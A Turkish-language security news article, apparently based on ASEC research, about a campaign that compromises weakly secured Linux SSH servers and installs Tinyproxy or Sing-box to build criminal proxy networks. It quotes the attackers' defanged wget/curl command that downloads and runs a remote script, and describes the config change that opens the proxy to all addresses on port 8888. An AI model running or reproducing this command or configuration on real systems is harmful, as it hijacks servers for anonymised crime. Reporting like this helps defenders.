Siber suçlular, kötü yönetilen Linux SSH sunucularına saldırılarını yoğunlaştırdılar ve gizli ağ altyapısını oluşturmak için sofistike proxy araçları dağıttılar.
Bu saldırılar, geleneksel kötü amaçlı yazılım dağıtımından, kötü niyetli amaçlar için meşru ağ araçlarının stratejik kurulumuna doğru bir kaymayı temsil eder.
Kampanya, Linux sunucularını zayıf SSH kimlik bilgilerine sahip, yetkisiz erişim elde etmek için yetersiz güvenlik konfigürasyonlarından yararlanıyor.
Kripto para madenciliğine veya dağıtılmış hizmet reddi operasyonlarına odaklanan geleneksel saldırıların aksine, bu müdahaleler özellikle uzlaşmış sistemleri ceza ağları içindeki vekil düğümlere dönüştürmeyi amaçlamaktadır.
ASEC araştırmacıları, Tinyproxy ve Sing-Box Proxy araçlarının kurulumunu içeren iki temel saldırı paterni belirlediler.
.webp)
Saldırılar, çekirdek proxy altyapısının ötesinde yabancı kötü amaçlı yazılım dağıtımı olmadan taktiksel bir hassasiyet göstermektedir ve ölçeklenebilir proxy ağları oluşturmaya odaklanan organize operasyonlar önermektedir.
Bu saldırıların sofistike doğası, hizmet olarak proxy teklifleri yoluyla tehlikeye atılan altyapıdan para kazanmayı veya sonraki cezai faaliyetler için anonimleştirmeyi kolaylaştırmak isteyen tehdit aktörlerinin koordineli çabalarını göstermektedir.
Enfeksiyon mekanizması ve dağıtım taktikleri
Tinyproxy dağıtım, komut aracılığıyla indirilen Polonya dil yorumlarını içeren kötü amaçlı bir Bash komut dosyası yürütmesiyle başlar: (wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh.
Komut dosyası, işletim sistemini otomatik olarak algılar ve APT, YUM veya DNF dahil uygun paket yöneticilerini kullanarak TinyProxy yükler.
Saldırının başarısı için kritik olan, Tinyproxy’nin erişim kontrollerinin yapılandırılmasıdır.
Kötü amaçlı yazılım, mevcut izinleri kaldırır ve kuralları reddeder /etc/tinyproxy/tinyproxy.confbunları değiştirmek Allow 0.0.0.0/0Port 8888 üzerinden sınırsız harici erişimin etkili bir şekilde izin verilmesi.
Sing-box varyantı, başlangıçta coğrafi içerik kısıtlamalarını atlamak için tasarlanmış, ancak cezai proxy ağları için yeniden yapılandırılacak şekilde tasarlanmış VMESS-ARGO, VLESS-gerçeklik, histeri2 ve TUICV5 protokollerini destekleyen çok amaçlı bir proxy dağıtarak GitHub ile barındırılan kurulum komut dosyalarını kullanır.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> Herhangi birini deneyin. Şimdi